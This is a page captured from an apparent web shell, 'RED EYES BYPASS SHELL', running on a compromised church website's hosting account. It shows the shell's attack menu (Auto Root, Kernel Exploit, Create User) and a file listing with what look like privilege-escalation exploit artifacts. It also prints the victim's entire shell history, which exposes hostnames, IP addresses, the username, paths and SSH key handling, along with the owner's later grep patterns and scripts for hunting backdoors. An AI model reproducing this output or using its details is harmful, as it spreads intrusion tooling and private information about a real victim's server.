Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .bash_history
cd www/presenceFloirac/ #1598392478 ls -la #1598392573 php accesSpreadsheet.php #1598392593 php accesSpreadsheet.php #1598392744 php accesSpreadsheet.php #1598392945 php accesSpreadsheet.php #1598393107 php accesSpreadsheet.php #1598393298 php spreadsheet.php #1598425717 cd www/presenceFloirac/ #1598425720 php scriptCRON.php #1598425904 ls #1598425905 cd #1598425907 ls #1598425908 cd / #1598425910 ls #1598425915 cd ~ #1598425916 ls #1598425921 cd .. #1598425922 ls #1598425925 cd .. #1598425926 ls #1598425939 cd ~ #1598425940 ls #1598426026 cd www/presenceFloirac/ #1598426029 php spreadsheet.php #1598426070 php accesSpreadsheet.php #1598426787 cd www/presenceFloirac/ #1598426790 php scriptCRON.php #1598427522 cd www/presenceFloirac/ #1598427532 ls #1598427577 cp scriptCRON.php scriptCRON-withoutrestriction.php #1598427618 ls -l #1598427670 cd .. #1598427672 ls -a #1598427676 ls -l #1598427733 d presenceFloirac/ #1598427736 cd presenceFloirac/ #1598427737 ls #1598427745 vi index.html #1598427901 cd .. #1598427908 chmod -R 705 presenceFloirac/ #1598427918 ls -la #1598427976 cd presenceFloirac/ #1598427987 php spreadsheet.php #1598428028 php accesSpreadsheet.php #1598428667 cd www/presenceFloirac/ #1598428696 ls -la #1598615657 cd www/presenceFloirac/ #1598625986 cd www/presenceFloirac/ #1598625991 php index.php #1598626262 exit #1598626629 cd www/presenceFloirac/ #1598626635 php index.php #1598626702 exit #1598646598 cd www/presenceFloirac/ #1598646626 php redirect.php #1598646687 php presence.html #1598646693 php index.php #1598646738 php index.php #1598646811 php index.php #1598646827 php index.php #1598646869 exit #1598647824 cd www/presenceFloirac/ #1598647831 php /usr/lib/php index.php #1598647840 whereis php #1598647852 php /usr/local/bin/php index.php #1598647894 php /usr/local/bin/php index.php #1598647900 php /usr/local/bin/php index.php #1598647910 php /usr/local/bin/php index.php #1598647912 php /usr/local/bin/php index.php #1598648148 php /usr/local/bin/php index.php #1598648160 php index.php #1598648184 php index.php #1598648203 php redirect.php #1598648215 php presence.html #1598648382 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598648438 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/redirect.php #1598648546 exit #1598650473 cd www/presenceFloirac/ #1598650478 php index.php #1598650566 php index.php #1598650622 php index.php #1598650976 cd www/presenceFloirac/ #1598650981 php index.php #1598651015 php index.php #1598651096 php index.php #1598651129 php index.php #1598651150 php index.php #1598651356 php index.php #1598651595 php index.php #1598651747 php index.php #1598651779 php index.php #1598651924 php index.php #1598652174 php index.php #1598652205 php index.php #1598652229 php index.php #1598652274 php index.php #1598652320 php index.php #1598652379 php index.php #1598652393 php index.php #1598652406 php index.php #1598652427 php index.php #1598652461 php index.php #1598652507 php index.php #1598652537 php index.php #1598652554 php index.php #1598652586 php index.php #1598652643 php index.php #1598652799 php index.php #1598652842 php index.php #1598653035 php index.php #1598653059 php index.php #1598653060 ls #1598653089 ls #1598653091 php index.php #1598653135 php index.php #1598653142 php index.php #1598653163 php index.php #1598653178 php index.php #1598653188 php index.php #1598653192 ls #1598653204 php index.php #1598653217 php index.php #1598653236 php index.php #1598653275 php index.php #1598653294 php index.php #1598653677 cd www/presenceFloirac/ #1598653680 php index.php #1598653689 ls #1598653695 vim cat.out #1598653838 php index.php #1598653853 php index.php #1598653959 php index.php #1598653978 php index.php #1598654066 php index.php #1598654099 php index.php #1598654113 php index.php #1598654144 php index.php #1598654188 php index.php #1598654211 php index.php #1598654242 php index.php #1598654282 php index.php #1598654339 php index.php #1598654355 php index.php #1598654506 php index.php #1598654513 php index.php #1598654561 php index.php #1598654566 php index.php #1598654595 php index.php #1598654602 php index.php #1598654615 php index.php #1598654617 php index.php #1598654638 php index.php #1598654707 php index.php #1598655053 cd www/presenceFloirac/ #1598655055 php index.php #1598656159 cd www/presenceFloirac/ #1598656162 php index.php #1598656292 php index.php #1598656345 php index.php #1598656352 php index.php #1598656367 php index.php #1598656399 php index.php #1598656410 php index.php #1598656447 php index.php #1598656461 php index.php #1598656470 php index.php #1598656496 php index.php #1598726924 python -m webbrowser https://stackoverflow.com #1598727134 ls #1598727138 cd www/presenceFloirac/ #1598727139 #1598727182 python -m webbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598727462 vi index.php #1598727490 vi index.php #1598727527 python -m webbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598729267 cd www/presenceFloirac/ #1598729307 touch AccesSpreadsheet.php #1598729352 php AccesSpreadsheet.php #1598729389 php -d display_errors=on AccesSpreadsheet.php #1598729399 php --help #1598729583 php AccesSpreadsheet.php -l #1598729684 php -d display_all AccesSpreadsheet.php #1598729691 php -d display_all=on AccesSpreadsheet.php #1598729697 php -d display_errors=on AccesSpreadsheet.php #1598729810 php AccesSpreadsheet.php #1598729843 rm AccesSpreadsheet.php #1598729850 php accesSpreadsheet.php #1598729863 php -d display_errors=on accesSpreadsheet.php #1598736760 php -d display_errors=on accesSpreadsheet.php #1598736766 cd www/presenceFloirac/ #1598736767 php -d display_errors=on accesSpreadsheet.php #1598736845 vi accesSpreadsheet.php #1598736932 vi accesSpreadsheet.php #1598736937 php -d display_errors=on accesSpreadsheet.php #1598737042 exit #1598737674 cd www/presenceFloirac/ #1598737680 php -d display_errors=on accesSpreadsheet.php #1598737700 php --version #1598737876 ls #1598737887 cd vendor/guzzlehttp/guzzle/ #1598737897 ls #1598737907 cd build/ #1598737908 ls #1598737910 cd .. #1598737913 cd src/ #1598737913 ls #1598737927 cd Exception/ #1598737928 ls #1598737941 vi ConnectException.php #1598737959 cd ../../../.. #1598737961 ls #1598737967 cd guzzlehttp/ #1598737968 ls #1598737976 cd promises/ #1598737977 ls #1598737980 cd src/ #1598737980 ls #1598737988 cd ../.. #1598737992 cd psr7/ #1598737993 ls #1598737995 cd src/ #1598737996 ls #1598738003 cd .. #1598738019 cd .. #1598738029 cd guzzle/src/Exception/ #1598738030 ls #1598738038 vi ConnectException.php #1598738244 cd .. #1598738246 ls #1598738266 cd Handler #1598738285 vi CurlFactory.php #1598738572 python -m webbrowser https://stackoverflow.com #1598738594 python -m webbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738670 python -mwebbrowser http://example.comhttp://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738685 python -mwebbrowser http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738697 python --help #1598738814 xdg-open http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738858 cygstart http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738882 man #1598738909 python http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598738953 google-chrome http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598739108 which php #1598739184 curl http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598739229 curl http://www.google.fr #1598739494 php -v #1598739635 apt install libapache2-mod-php php-curl #1598739688 curl http://www.google.fr --ipv4 #1598739723 curl --ipv4 http://www.google.fr #1598740133 cd www/presenceFloirac/ #1598740141 touch phpinfo.php #1598740143 vi #1598740181 vi phpinfo.php #1598740213 php phpinfo.php #1598740261 touch curl.php #1598740363 php curl.php #1598740473 php -d display_errors=on redirect.php #1598740788 wget --version #1598740826 wget -O -q http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598740868 wget -O -q http://www.eglisebaptistefloirac.fr/presenceFloirac/presence.html #1598740951 php -f http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598740990 wget http://www.eglisebaptistefloirac.fr/presenceFloirac/index.php #1598743741 cd www/presenceFloirac/ #1598743746 php curl.php #1598743839 php curl.php #1598743843 php curl.php #1598799125 cd www/presenceFloirac/ #1598799126 ls #1598799128 ls -l #1598799161 rm accesSpreadsheet.php cat.out curl.php scriptCRON-withoutrestriction.php #1598799162 ls #1598799166 ls -l #1598894718 cd www/presenceFloirac/ #1598894720 vi index.php #1598894781 vi index.php #1598894838 vi index.php exit #1598894868 ls #1598894874 exit #1599077493 exit #1599163432 cd www/presenceFloirac/ #1599163434 vi functions.php #1599163591 vi functions.php #1599163608 vi functions.php #1599163828 vi index.php #1599163869 exit #1599164551 cd www/presenceFloirac/ #1599164554 vi index.php #1599164565 vi functions.php #1599164620 vi env.php #1753521269 ls #1753521274 cd www #1753521288 grep -r --include=*.php "base64_decode" . #1753521313 grep -r --include=*.php "eval(" . #1753521317 grep -r --include=*.php "gzinflate" . #1753521359 grep -r --include=*.php "base64_decode" . #1753521366 grep -r --include=*.php "eval(" . #1753521366 grep -r --include=*.php "gzinflate" . #1753521424 grep -rl --include="*.php" -e "base64_decode" -e "eval(" -e "gzinflate" -e "shell_exec" -e "system(" -e "passthru(" -e "preg_replace.*\/e" -e "exec(" -e "assert(" -e "str_rot13" -e "ob_start" -e "phpinfo" . #1753521451 grep -rl --include="*.php" -e "base64_decode" -e "eval(" -e "gzinflate" -e "shell_exec" -e "system(" -e "passthru(" -e "preg_replace.*\/e" -e "exec(" -e "assert(" -e "str_rot13" -e "ob_start" -e "phpinfo" ./ #1753522190 find . -type f -printf "%T@ %p\n" | sort -nr | cut -d' ' -f2- #1753522283 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 100 #1753522344 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 1000 #1753545677 ls #1753545714 cd www #1753545716 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 100 #1753545748 find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 1000 > URL.txt #1753545832 { echo "date_modification,chemin_fichier"; find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS,%p\n' | sort -r | head -n 100; } > fichiers_modifies.csv #1753545949 { echo "date_modification;chemin_fichier"; find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS;%p\n' | sort -r | head -n 1000; } > fichiers_modifies.csv #1753546451 cd www #1753546470 chmod +x resultatBackdoor.sh #1753546477 ./resultatBackdoor.sh #1753546617 ./resultatBackdoor.sh #1753546621 chmod +x resultatBackdoor.sh #1753546623 ./resultatBackdoor.sh #1753546685 { echo "date_modification;chemin_fichier"; find . -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS;%p\n' | sort -r | head -n 1000; } > fichiers_modifies.csv #1753546707 ./resultatBackdoor.sh #1753546781 ./resultatBackdoor.sh #1753546784 chmod +x resultatBackdoor.sh #1753546786 ./resultatBackdoor.sh #1753546803 ./resultatBackdoor.sh #1753546806 chmod +x resultatBackdoor.sh #1753546807 ./resultatBackdoor.sh #1753546815 chmod +x resultatBackdoor.sh #1753546816 ./resultatBackdoor.sh #1753546829 pwd #1753546840 chmod +x resultatBackdoor.sh #1753546842 ./resultatBackdoor.sh #1753546877 tail -n +2 fichiers_modifies.csv | while IFS=',' read -r date fichier; do echo "[$date] [$fichier]"; done #1753546929 chmod +x resultatBackdoor.sh #1753546931 ./resultatBackdoor.sh #1753547061 cat resultats_backdoor.txt #1753548015 grep -r "wCuHkrT" /homez.742/eglisebaa/www/ #1753548702 grep -r "70121990" /homez.742/eglisebaa/www/ #1753690081 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 100 > fichiers_modifies.csv #1753690105 qfind . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753690114 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753690727 find . -type f -printf "%T@,%Tc,%p\n" | sort -nr | head -n 500 #1753691031 ls #1753691047 cd ssl #1753691048 ls #1753691050 cd .. #1753691055 rm demo #1753691065 sudo rm demo #1753691075 rm demo -rf #1753691085 ls #1753691087 cd demo #1753691089 ls #1753691094 rm * #1753691155 rm -rf #1753691158 ls #1753691174 cd ;; #1753691177 cd .. #1753691185 rm demo -rf #1753691216 sudo rm demo -rf #1753691244 su rm demo -rf #1753783431 cd www #1753783443 cd wp-content/ #1753783444 ls #1753783450 cd uploads/ #1753783452 ls #1753783501 cd ac_assets/ #1753783502 ls #1753783506 cd #1753783508 cd www #1753783516 ls www-joomla/ #1753783562 find /chemin/du/répertoire -type f | wc -l #1753783592 find /www/www-joomla -type f | wc -l #1753783601 find /www-joomla -type f | wc -l #1753783607 find www-joomla -type f | wc -l #1753783615 find www-joomla -type f | wc -l #1753783625 find www-joomla -type f | wc -l #1753783706 find www-joomla -type f | wc -l #1753783755 find www-joomla -type f | wc -l #1753783778 find www-joomla -type f | wc -l #1753783857 find www-joomla -type f | wc -l #1753783923 find www-joomla -type f | wc -l #1753783970 find www-joomla -type f | wc -l #1753783989 find www-joomla -type f | wc -l #1753784009 find www-joomla -type f | wc -l #1753784065 find www-joomla -type f | wc -l #1753784119 find www-joomla -type f | wc -l #1753784134 find www-joomla -type f | wc -l #1753784164 find www-joomla -type f | wc -l #1753784168 find www-joomla -type f | wc -l #1753784175 find www-joomla -type f | wc -l #1753784179 find www-joomla -type f | wc -l #1753784181 find www-joomla -type f | wc -l #1753784187 ls #1753784190 cd .. #1753784190 ls #1753784198 rm demo/ #1753784209 find demo -type f | wc -l #1753804186 cd www #1753804198 cd wp-admin/ #1753804198 ll #1753804203 ls -la #1753823600 cd www/wp-content/uploads/ #1753823646 cd 2025 #1753823647 find . -type f -iname "*.mp3" -printf "%T@ %p\n" | sort -n | cut -d' ' -f2- #1753824329 cd www/wp-content/uploads/2025 #1753824330 find . -type f -iname "*.mp3" -printf "%T@ %p\n" | sort -n | cut -d' ' -f2- #1753824565 cd #1753824580 cd /home/eglisebaa/www/wp-content/plugins/elementor/modules/system-info/reporters/ #1753824582 ll #1753824585 ls -l #1753824600 sudo chmod 644 user.php #1753824602 ls -l #1753824622 chmod 644 user.php #1753824624 ls -l #1753824695 cd /home/eglisebaa/www/wp-content/plugins/elementor/core/files/ #1753824697 ls -l #1753824715 chmod 644 uploads-manager.php #1753824717 ls -l #1753824727 cd ../dynamic-tags/ #1753824730 ls -l #1753824745 chmod 644 manager.php #1753824747 ls -l #1753871595 ls #1753871597 cd www #1753871611 cd wp-content/ #1753871617 cd cache/ #1753871619 ls #1753871628 cd.. #1753871629 rm -rf wp-content/cache/* #1753871629 rm -rf wp-content/uploads/cache/* #1753871629 rm -rf wp-content/wpo-cache/* #1753871634 ll #1753871636 ls #1753871638 cd .. #1753871645 rm -rf wp-content/cache/* #1753871648 rm -rf wp-content/cache/* #1753871658 cd .; #1753871660 cd .. #1753871663 rm -rf wp-content/cache/* #1753871683 rm -rf wp-content/uploads/cache/* #1753871693 rm -rf wp-content/wpo-cache/* #1753871697 cd cach #1753871836 exit #1753873801 grep -ri "sitemap" /homez.742/eglisebaa/www #1753873868 grep -ril "sitemap" /homez.742/eglisebaa/www #1756113686 find . -type f -iname "*.mp3" -exec stat -f "%m %N" {} \; | sort -n | cut -d' ' -f2- #1756113737 find . -type f -iname "*.mp3" -printf "%T@ %TY-%Tm-%Td %TH:%TM:%TS %p\n" | sort -n #1756114062 find . -type f -iname "*.mp3" -printf "%T@ %TY-%Tm-%Td %TH:%TM:%TS %p\n" | sort -n #1761757627 cd www #1761757629 ls #1761757636 cd .. #1761757642 mv www/6digits.sh . #1761757648 chmod +x 6digits.sh #1761757656 ./6digits.sh www #1761757676 ./6digits.sh www -d -y #1761757679 ./6digits.sh www #1761758460 ls #1761758463 cd www/ #1761758464 ls #1761758473 cd wp-content/ #1761758474 ls #1761758478 rm debug.log #1761758515 rm debug.log #1761758570 ls #1761758573 rm debug.log #1761758574 ls #1763976430 ls #1763976485 find www -type f -printf "%T@ %p\n" | sort -nr | cut -d' ' -f2- #1763976519 find www -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 50 #1763976611 find www -type d -path "www/wp-content/cache" -prune -o -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 50 #1763976875 find www -type d -path "www/wp-content/cache" -prune -o -type f -printf '%TY-%Tm-%Td %TH:%TM:%TS %p\n' | sort -r | head -n 150 #1768144591 exit #1768144755 ssh-copy-id eglisebaa@ssh.cluster006.hosting.ovh.net #1768144758 exit #1768144794 exit #1768144805 exit #1768145062 exit #1768145143 exit #1768145149 exit #1768145158 exigt #1768145161 exit #1768145211 exit #1768145224 exit #1768145361 exit #1768145415 ls .ssh/ #1768145417 ls #1768145421 cd .ssh/ #1768145422 ls #1768145424 cd authorized_keys #1768145424 ls #1768145435 cat authorized_keys #1768145448 exit #1768145478 cd .ssh/ #1768145479 ls #1768145481 rm authorized_keys #1768145483 ls #1768145485 exit #1768145543 exit #1768145609 exit #1768145626 exit #1769874691 exit #1769874709 exit #1769936741 exit #1769936757 exit #1769937172 exit
Close